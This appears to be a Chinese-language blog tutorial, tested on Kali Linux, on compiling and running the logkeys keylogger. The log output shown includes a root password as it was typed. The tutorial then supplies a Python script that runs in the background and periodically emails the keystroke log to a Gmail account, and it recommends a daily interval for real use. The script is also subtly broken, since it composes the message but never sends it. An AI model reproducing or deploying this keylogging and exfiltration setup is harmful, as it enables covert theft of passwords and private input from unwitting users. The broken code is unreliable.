logkeys是一个键盘记录软件,他的源代码托管在google code上,主页为https://code.google.com/p/logkeys/
测试环境是是Kali Linux
首先下载logkeys
解压
[email protected]:~# tar -zxvf logkeys*[email protected]:~# cd logkeys* |
看一下INSTALL文件
[email protected]:~/Desktop/logkeys-0.1.1a# cat INSTALL =============================================================================== logkeys keylogger - instalation instructions===============================================================================Provided your GNU/Linux distribution doesn't include logkeys package in itsrepositories, manual installation of logkeys from source is as easy as: $ tar xvzf logkeys-0.1.0.tar.gz # to extract the logkeys archive $ cd logkeys-0.1.0/build # move to build directory to build there $ ../configure # invoke configure from parent directory $ make # make compiles what it needs to compile ( become superuser now ) # you need root to install in system dir # make install # installs binaries, manuals and scriptsThat's it. To ever uninstall logkeys, remove accompanying scripts and manuals, issue # make uninstall # in the same logkeys-0.1.0/build dir from beforeSee README file for usage instructions and notes.[email protected]:~/Desktop/logkeys-0.1.1a# |
帮助文档写的很清楚了,接下来是编译
[email protected]:~/logkeys-0.1.1a# cd build [email protected]:~/logkeys-0.1.1a/build# ls[email protected]:~/logkeys-0.1.1a/build#//linux编译的经典三部曲[email protected]:~/Desktop/logkeys-0.1.1a/build# ../configure[email protected]:~/Desktop/logkeys-0.1.1a/build# make[email protected]:~/Desktop/logkeys-0.1.1a/build# make install [email protected]:~/Desktop/logkeys-0.1.1a/build# ls config.h config.log config.status Makefile man scripts src stamp-h1[email protected]:~/Desktop/logkeys-0.1.1a/build# cd src [email protected]:~/Desktop/logkeys-0.1.1a/build/src# ls llk llkk llkk.o llk.o logkeys logkeys.o Makefile |
logkeys就是生成的二进制文件
[email protected]:~/Desktop/logkeys-0.1.1a/build/src# cp logkeys /bin [email protected]:~/Desktop/logkeys-0.1.1a/build/src# ls llk llkk llkk.o llk.o logkeys logkeys.o Makefile[email protected]:~/Desktop/logkeys-0.1.1a/build/src# logjeys -h bash: logjeys: 未找到命令[email protected]:~/Desktop/logkeys-0.1.1a/build/src# logkeys -h logkeys: invalid option -- 'h'Usage: logkeys [OPTION]...Log depressed keyboard keys. -s, --start start logging keypresses -m, --keymap=FILE use keymap FILE -o, --output=FILE log output to FILE [/var/log/logkeys.log] -u, --us-keymap use en_US keymap instead of configured default -k, --kill kill running logkeys process -d, --device=FILE input event device [eventX from /dev/input/] -?, --help print this help screen --export-keymap=FILE export configured keymap to FILE and exit --no-func-keys log only character keys --no-timestamps don't prepend timestamps to log file lines --post-http=URL POST log to URL as multipart/form-data file --post-size=SIZE post log file when size equals SIZE [500k]Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log logkeys -s -d event6 logkeys -klogkeys version: 0.1.1alogkeys homepage: <http://code.google.com/p/logkeys/>[email protected]:~/Desktop/logkeys-0.1.1a/build/src# |
在logkeys的参数中,最麻烦的是”-m”键盘布局选项
我使用默认的键盘布局文件,得到的结果如下
[email protected]:~# logkeys -k [email protected]:~# logkeys -s -o /root/.logkeys [email protected]:~# ls Desktop Downloads Python[email protected]on:~# cat .logkeys Logging started ...2013-11-13 08:36:57+0800 > ka 2013-11-13 08:37:02+0800 > x܂t ,kofjeya [email protected]:~# |
很明显的键位偏移了,可以使用”-u”参数指定标准美式键盘
[email protected]:~# logkeys -s -u -o .test.txt [email protected]:~# ls Desktop Downloads Python[email protected]:~# passwd root输入新的 UNIX 密码:重新输入新的 UNIX 密码:passwd:已成功更新密码[email protected]:~# cat .test.txt Logging started ...2013-11-13 08:42:52+0800 > ls 2013-11-13 08:42:54+0800 > cat .test.txt 2013-11-13 08:42:59+0800 > clear2013-11-13 08:43:09+0800 > ls 2013-11-13 08:43:10+0800 > passwd root2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck2013-11-13 08:43:29+0800 > f4ck2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt [email protected]:~# |
搞定,如果这么结束的话就没意思了,接下来的才是重点
#!/usr/bin/env python#coding=utf-8import smtplib from email.Message import Message import timeimport optparseimport schedschedular=sched.scheduler(time.time,time.sleep)def sendMail(theEmail, thePasswd): systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time())) try: fileObj=open("/root/.logkeys", "r") #"/root/.logkeys"是键盘记录的输出文件,根据输出文件的不同适当的修改 content=fileObj.read() except: print "Cannot read file\n" exit() message = Message() message['Subject'] = 'Log Keys' #邮件标题 message['To'] = theEmail message.set_payload("当前时间"+systemTime+"\n"+content) #邮件正文 msg = message.as_string() smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20) #sm.set_debuglevel(1) #开启debug模式 smtp.starttls() #使用安全连接 smtp.login(theEmail, thePasswd) time.sleep(5) #避免邮件没有发送完成就调用了quit() smtp.quit() def perform(inc, theEmail, thePasswd): schedular.enter(inc,0,perform,(inc,theEmail, thePasswd)) sendMail(theEmail, thePasswd)def myMain(inc, theEmail, thePasswd): schedular.enter(0,0,perform,(inc,theEmail, thePasswd)) schedular.run() if __name__=="__main__": optObj=optparse.OptionParser() optObj.add_option("-u", dest="user", help="Gmail account") optObj.add_option("-p", dest="passwd", help="Gmail Passwd") (options, args)=optObj.parse_args() emailName=options.user emailPasswd=options.passwd myMain(15, emailName, emailPasswd) //15表示的是相隔时间,可以根据自己的需求设定 |
该脚本的作用是定时读取logkeys的输出文件,并发送到gmail邮箱。脚本的使用也很简单
[email protected]:~/Python# python mail.py -h Usage: mail.py [options]Options: -h, --help show this help message and exit -u USER Gmail account -p PASSWD Gmail Passwd[email protected]:~/Python# ls file.txt mail.py nohup.out[email protected]:~/Python# nohup ./mail.py -u [email protected] -p passwd & [1] 7499[email protected]:~/Python# nohup: 忽略输入并把输出追加到"nohup.out" |
我测试的时候是以15秒为间隔,实际使用时远不需这么高的频率,一天一次差不多